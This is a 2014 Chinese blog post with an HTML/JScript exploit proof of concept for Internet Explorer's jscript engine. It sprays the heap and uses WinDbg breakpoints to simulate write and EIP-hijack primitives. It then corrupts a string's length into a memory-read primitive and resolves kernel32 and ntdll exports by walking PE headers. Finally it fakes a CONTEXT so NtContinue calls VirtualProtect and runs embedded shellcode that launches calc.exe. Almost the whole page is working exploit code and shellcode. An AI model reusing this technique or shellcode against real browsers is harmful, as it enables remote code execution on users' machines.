测试NOROP  

2014-12-01 09:31:42|  分类: 一些练习 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
用泄漏信息构造shellcode,并模拟测试弹计算器。
/*
测试NO ROP运行计算器
泄露基址的硬编码地址(testaddr = 0x3e389ad2)请自行改正!
调试请下两个断点(它们用来模拟漏洞原语:JsAtan2 处模拟向任意地址写入 4 字节,cos 处模拟劫持 EIP 去调用 NtContinue):
bu jscript!JsAtan2 ".echo =ed=;r @$t1=poi(poi(@esp+14)+18);r @$t2=poi(poi(@esp+14)+8);ed @$t1 @$t2;r @$t1;r @$t2;g"
bu msvcrt!cos ".echo =run_calc=;r @eip=ntdll!NtContinue;ed @esp+4 0c0c0d0c;g"
*/
<!DOCTYPE HTML>
<HTML>
 <HEAD>
  <TITLE> NO ROP TEST </TITLE>
 </HEAD>

 <BODY>
  <SCRIPT LANGUAGE="JavaScript">
  <!--
// Heap spray: fill a large region with NUL-filled strings so that the
// target address spryaddr (0x0c0c0c0c) lands inside one of them.

// Seed: a single UTF-16 NUL code unit (2 bytes).
var block = "\u0000";

// Double until the string holds 0x40000 code units (512 KB of character data).
do {
  block = block.concat(block);
} while (block.length < 0x40000);

// 400 slots x 512 KB = ~200 MB.  substr() over the full length is used
// instead of assigning `block` directly, presumably to force a distinct
// allocation per slot rather than sharing one string.
var slide = [];
for (var i = 0; i < 400; i++) {
  slide.push(block.substr(0, block.length));
}
// alert("heap spray done");

// Address inside the spray that the simulated writes target.
var spryaddr = 0x0c0c0c0c;

// Shared state filled in further down: index of the sprayed string that got
// modified, the string itself (later turned into the read primitive), and the
// address of its length field.
var p;
var modified;
var leakstr;
var lenaddr;

// Simulated arbitrary write #1 ("use the vulnerability to write to a chosen
// address").  With the jscript!JsAtan2 breakpoint from the header active, the
// debugger stores the second argument (0x11223344) as a dword at the address
// given by the first argument (spryaddr) -- see the =ed= trace below: $t1 is
// the address, $t2 the value.  Without the debugger this is a plain atan2.
Math.atan2(spryaddr, 0x11223344);// bu jscript!JsAtan2 ".echo =ed=;r @$t1=poi(poi(@esp+14)+18);r @$t2=poi(poi(@esp+14)+8);ed @$t1 @$t2;r @$t1;r @$t2;g"

// =ed=
// $t1=0c0c0c0c
// $t2=11223344

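// Find which sprayed string absorbed write #1: the only one that now contains
// a non-NUL code unit.  `p` is the unit index at which 0x11223344 landed, so
// the string's character data starts at spryaddr - 2*p, and the 4-byte length
// field that write #2 targets sits just before it (hence the -4).
for (i = 0; i < slide.length; i++) {
  p = slide[i].search(/[^\u0000]/);
  if (p != -1) {
    modified = i;
    leakstr = slide[modified];
    lenaddr = spryaddr - p * 2 - 4;
    break;
  }
}
// Fail with a meaningful message when nothing changed -- typically because
// the JsAtan2 breakpoint was not set, so the write never happened -- rather
// than with a bare TypeError from lenaddr.toString below.
if (lenaddr === undefined) {
  throw new Error("no sprayed string was modified at 0x" + spryaddr.toString(16) + "; is the jscript!JsAtan2 breakpoint set?");
}
alert(lenaddr.toString(16));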

// Simulated write #2 ("use the vulnerability to set the string length to a
// huge number"): overwrite the length field of the string found above with
// 0x7ffff000 code units, so that leakstr can be indexed far beyond its real
// allocation and serves as the read primitive used by readDword() below.
Math.atan2(lenaddr, 0x7ffff000);// bu jscript!JsAtan2 ".echo =ed=;r @$t1=poi(poi(@esp+14)+18);r @$t2=poi(poi(@esp+14)+8);ed @$t1 @$t2;r @$t1;r @$t2;g"

// =ed=
// $t1=0c060020
// $t2=7ffff000

// A pointer known from the author's debugger session to lie inside
// jscript.dll; the downward header scan (GetBaseAddrByPoiAddr) starts here
// to find jscript's base.  Hard-coded for that environment -- adjust it for
// yours, as the header note says.
var testaddr = 0x3e389ad2; // test address used to leak a module base

//alert(leakstr.length.toString(16));
//alert(escape(leakstr.substr((testaddr-lenaddr-4)/2, 8)));

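// Read a little-endian 32-bit value at `address` through the corrupted
// string `leakstr`, whose character data starts at lenaddr + 4 (lenaddr is
// the address of its length field, computed above).  Unit index =
// (address - lenaddr - 4) / 2, so `address` must be 2-byte aligned; an odd
// address is rejected instead of silently reading from address - 1.
// Returns an unsigned value (0..0xffffffff): the result is forced with
// `>>> 0` so a high half with its top bit set does not come back negative.
// Out-of-range reads yield NaN code units, which collapse to 0.
function readDword(address) {
  if (address % 2 !== 0) {
    throw new Error("readDword: address must be 2-byte aligned: 0x" + address.toString(16));
  }
  var units = leakstr.substr((address - lenaddr - 4) / 2, 2);
  var lo = units.charCodeAt(0);
  var hi = units.charCodeAt(1);
  return ((hi << 16) | lo) >>> 0;
}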

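// Walk downward from `PoiAddr` in 0x10000 steps (module bases are assumed
// to be 64 KB aligned) until a PE image header is found, and return that
// base.  A header is recognised by the 'MZ' signature (0x5A4D) in the low 16
// bits of the first dword -- only those two bytes are the signature; the
// byte after them (0x90 in the usual stub) is not required -- plus the
// 0x0000FFFF dword at offset 0xC of the common Microsoft DOS stub.
// Throws instead of scanning below address 0 when no header is found; the
// unbounded loop would otherwise never terminate.
function GetBaseAddrByPoiAddr(PoiAddr) {
  var BaseAddr = (PoiAddr & 0xFFFF0000) >>> 0;
  while (BaseAddr > 0) {
    var first = readDword(BaseAddr);
    if ((first & 0xFFFF) === 0x5A4D && readDword(BaseAddr + 0xC) === 0x0000FFFF) {
      return BaseAddr;
    }
    BaseAddr -= 0x10000;
  }
  throw new Error("GetBaseAddrByPoiAddr: no PE header found below 0x" + PoiAddr.toString(16));
}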
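// Read a NUL-terminated ASCII string at `astraddr` through the leak string
// and return it as a JavaScript string.  At most 32 code units (64 bytes)
// are fetched, starting at the 2-byte-aligned address at or below
// `astraddr`; for an odd address the low byte of the first unit belongs to
// the previous byte and is skipped.  Reading stops at the first NUL byte
// (or at the 64-byte window), so the result is at most 64 characters.
// Bytes are converted with String.fromCharCode; the former "%u00" + hex +
// unescape() path produced a malformed escape for bytes below 0x10.
// `w` is a declared local here -- it used to leak as an implicit global.
function astr2jstr(astraddr) {
  var base = (astraddr % 2) ? astraddr - 1 : astraddr;
  var units = leakstr.substr((base - lenaddr - 4) / 2, 32);
  var out = "";
  var i = 0;
  var w;

  if (astraddr % 2 !== 0) {
    // Odd start: only the high byte of the first unit is part of the string.
    w = units.charCodeAt(0);
    if (!(w >> 8)) {
      return out;
    }
    out += String.fromCharCode(w >> 8);
    i = 1;
  }

  for (; i < units.length; i++) {
    w = units.charCodeAt(i);
    if (!(w & 0xff)) {
      break;
    }
    out += String.fromCharCode(w & 0xff);
    if (!(w >> 8)) {
      break;
    }
    out += String.fromCharCode(w >> 8);
  }
  return out;
}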

//alert( "astr2jstr="+astr2jstr(testaddr) );

function GetModuleFromImport( ModuleName, LibAddr )
{
var p   = 0;
var pImport;  // PIMAGE_IMPORT_DESCRIPTOR
p = readDword(LibAddr + 0x3C); 
p = readDword(LibAddr + p + 0x80);
pImport = LibAddr + p;
while( readDword(pImport+0x0C) != 0 )
{
if (ModuleName.toLowerCase()==astr2jstr(LibAddr+readDword(pImport+0x0C)).toLowerCase())
{
p = LibAddr + readDword(pImport+0x10);
p = readDword(p+0x10);
return GetBaseAddrByPoiAddr(p);
}
pImport+=0x14;
}
}


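// Look up the export `ProcName` (compared case-insensitively) of the module
// at `LibAddr` and return its virtual address, using only the read primitive.
// PE32 offsets: e_lfanew at 0x3C, export directory RVA at NT headers + 0x78
// (DataDirectory[0]); within the export directory NumberOfNames is at +0x18,
// AddressOfFunctions at +0x1C, AddressOfNames at +0x20 and
// AddressOfNameOrdinals at +0x24.  Ordinals are 16-bit, so each one is read
// with the 32-bit primitive at a 2-byte-aligned address and masked.
// NOTE(review): forwarded exports are not detected -- for one of those the
// returned address points at the forwarder string, not code.
// Throws when the name is not exported; indexing the ordinal table with
// i == NumberOfNames would otherwise return a garbage address silently.
// All temporaries are locals (NumberOfNames, t5, t6 and p used to be
// implicit globals).
function GetProcAddress(LibAddr, ProcName) {
  var wanted = ProcName.toLowerCase();
  var ntHeaders = LibAddr + readDword(LibAddr + 0x3C);
  var pExport = LibAddr + readDword(ntHeaders + 0x78);
  var numberOfNames = readDword(pExport + 0x18);
  var functions = LibAddr + readDword(pExport + 0x1C);
  var names = LibAddr + readDword(pExport + 0x20);
  var ordinals = LibAddr + readDword(pExport + 0x24);

  for (var n = 0; n < numberOfNames; n++) {
    if (astr2jstr(LibAddr + readDword(names + 4 * n)).toLowerCase() === wanted) {
      var ordinal = readDword(ordinals + 2 * n) & 0xFFFF;
      return LibAddr + readDword(functions + 4 * ordinal);
    }
  }
  throw new Error("GetProcAddress: " + ProcName + " is not exported by the module at 0x" + LibAddr.toString(16));
}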

// Resolve the modules and exports the sprayed context needs, with nothing
// but the read primitive: jscript's base from the hard-coded testaddr,
// kernel32 through jscript's import table, ntdll through kernel32's, then
// three exports.  Of these only VirtualProtect is placed into sc_ctx below
// (as the context's Eip); WinExec and NtContinue are resolved but not used
// by this script -- NtContinue is reached via the msvcrt!cos breakpoint.
var jscript = GetBaseAddrByPoiAddr(testaddr);
var kernel32 = GetModuleFromImport("kernel32.dll", jscript);
var ntdll    = GetModuleFromImport("ntdll.dll", kernel32);
var VirtualProtect = GetProcAddress(kernel32, "VirtualProtect");
var WinExec        = GetProcAddress(kernel32, "WinExec");
var NtContinue     = GetProcAddress(ntdll, "NtContinue");

//alert("jscript="+jscript.toString(16));
//alert("kernel32="+kernel32.toString(16));
//alert("ntdll="+ntdll.toString(16));
//alert("VirtualProtect="+VirtualProtect.toString(16));
//alert("WinExec="+WinExec.toString(16));
//alert("NtContinue="+NtContinue.toString(16));

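// Encode a 32-bit value as two "%uXXXX" escapes which, after unescape(),
// occupy memory little-endian: the low 16 bits become the first UTF-16 unit
// and the high 16 bits the second.  The value is normalised to unsigned
// 32-bit with `>>> 0` first, so a negative input (for example a signed
// `x << 16` result) cannot put a "-" into the hex text.
// This definition is closed with its own brace; in the listing as published
// the brace was missing, which made sc_ctx and the write loop below part of
// this function's (unreachable) body and left the script unparsable.
function dd2str(dword) {
  var hex = (dword >>> 0).toString(16);
  while (hex.length < 8) {
    hex = "0" + hex;
  }
  return "%u" + hex.substr(4, 4) + "%u" + hex.substr(0, 4);
}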

var sc_ctx = unescape(dd2str(spryaddr+0x1c)+dd2str(spryaddr & 0xffff0000)+"%u0000%u0001%u0040%u0000"+dd2str(spryaddr+0x18)+"%u9090%u9090%u9090%u9090%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%ue0bb%u2a1d%u680a%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u2e63%u7865%u0065%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u003f%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u0000%u0000%u003b%u0000%u0023%u0000%u0023%u0000%u2222%u2222%u2222%u2222%u2222%u2222%u2222%u2222%u2222%u2222%u2222%u2222%u2222%u2222"+dd2str(VirtualProtect)+"%u001b%u0000%u0246%u0001"+dd2str(spryaddr)+"%u0023%u0000%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333
%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u0000%u0000");

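// Copy sc_ctx into the spray one dword at a time through the simulated write
// primitive (JsAtan2 breakpoint).  Each iteration packs two UTF-16 units --
// unit i as the low half, unit i+1 as the high half -- and stores them at
// spryaddr + 2*i, so the layout built with dd2str()/unescape() above lands
// in memory as written: from spryaddr, what looks like a VirtualProtect
// frame (return address spryaddr+0x1c, lpAddress = spryaddr & 0xffff0000,
// size 0x10000, protection 0x40, lpflOldProtect = spryaddr+0x18) followed by
// NOPs and the shellcode; at spryaddr + 0x100 (= 0x0c0c0d0c, the pointer the
// msvcrt!cos breakpoint hands to NtContinue) a structure whose fields
// (0x1003f, segment selectors, Eip = VirtualProtect, Esp = spryaddr) match
// an x86 CONTEXT.  The value is deliberately kept as a signed 32-bit integer
// (no `>>> 0`): the breakpoint script reads a raw 32-bit slot out of the
// argument record, and a value above 0x7fffffff might presumably be handed
// to atan2 in a different numeric representation.
// `dword` is declared here; it used to be an implicit global.
var dword;
for (i = 0; i < sc_ctx.length; i += 2) {
  dword = (sc_ctx.charCodeAt(i + 1) << 16) | sc_ctx.charCodeAt(i);
  Math.atan2(spryaddr + i * 2, dword); // simulated write of `dword` to spryaddr + 2*i
}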

alert("shellcode test!");
// Trigger.  With the msvcrt!cos breakpoint from the header active, the
// debugger rewrites eip to ntdll!NtContinue and the first argument slot
// ([esp+4]) to 0x0c0c0d0c (= spryaddr + 0x100), so instead of running cos()
// the thread continues with the register state written into the spray above
// (Eip = VirtualProtect, Esp = spryaddr).  Without the debugger this is an
// ordinary cos(0).
Math.cos(0); // bu msvcrt!cos ".echo =run_calc=;r @eip=ntdll!NtContinue;ed @esp+4 0c0c0d0c;g"
alert("over!");
  //-->
  </SCRIPT>
 </BODY>
</HTML>